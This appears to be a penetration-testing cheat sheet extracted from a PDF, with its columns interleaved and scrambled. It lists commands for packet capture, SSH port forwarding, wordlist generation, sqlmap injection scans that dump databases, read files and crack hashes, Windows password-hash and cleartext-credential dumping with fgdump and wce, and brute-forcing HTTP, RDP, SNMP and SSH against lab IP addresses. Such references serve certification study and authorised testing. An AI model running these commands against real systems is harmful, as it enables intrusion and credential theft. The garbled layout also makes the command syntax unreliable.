Packet Inspection
Port Forward
COMMAND
DESCRIPTION
COMMAND
DESCRIPTION
tcpdump tcp port 80 –w output.pcap i
tcpdump for port 80 on interface eth0, outputs to
ssh <gateway> -L <local port to
Local port forward. 127.0.0.1:<port> is now redirected to
eth0
output.pcap
listen>:<remote host>:<remote port>
the remote host
Wireshark
GUI tools that perform packet inspection
ssh <gateway> -R <remote port to
Remote port forward. Access 127.0.0.1:<port> now to
bind>:<local host>:<local port>
connect to the remote host at remote binded port
Password Generation
ssh -D <local proxy port> -p <remote
Dynamic port forward. We created a SOCK proxy at local
port> <target>
machine now.
COMMAND
DESCRIPTION
SQL Map
/usr/share/wordlists/
Kali password list
crunch 6 6 0123456789ABCDEF -o
Generate password list with only 0-9, A-F character,
COMMAND
DESCRIPTION
crunch1.txt
length = 6, output to crunch1.txt
sqlmap -u –forms –batch
Automated sqlmap scan
–crawl=10
crunch 4 4 -f
Generate password list with specific character set, length
–cookie=jsessionid=54321 –level=5 –
/usr/share/crunch/charset.lst mixalpha
= 4
risk=3
cewl -m 6 -w
Generate password list from megacorpone website and
sqlmap -u TARGET -p PARAM –
Targeted sqlmap scan
megacorp-cewl.txt
output to megacorp-cewl.txt
data=POSTDATA –cookie=COOKIE
nano /etc/john/john.conf
Mutate password according to the rules
–level=3 –current-user –current-db –
john --wordlist=megacorp-cewl.txt --rules
passwords
--stdout > mutated.txt
–file-read=”/var/www/blah.php”
sqlmap -u
Scan url for union + error based injection with mysql
Password Cracking
“ /meh.php?id=1”
backend
–dbms=mysql –tech=U –random-agent –
and use a random user agent + database dump
dump
COMMAND
DESCRIPTION
sqlmap -o -u “ /form/” –
sqlmap check form for injection
fgdump.exe
Dump windows password hash
forms
wce -w
Dump the windows clear text password
sqlmap -o -u “ –
sqlmap dump and crack hashes for table users on
forms
database-name.
medusa -h 10.11.1.219 -u admin -P
HTTP Bruteforce
-D database-name -T users –dump
password-file.txt -M http -m
DIR:/admin -T 10
ncrack -vv --user offsec -P password-
RDP Bruteforce
file.txt rdp://10.11.1.35
hydra -P password-file.txt -v 10.11.1.219
SNMP Bruteforce
snmp
hydra -l root -P password-file.txt
SSH Bruteforce
10.11.1.219 ssh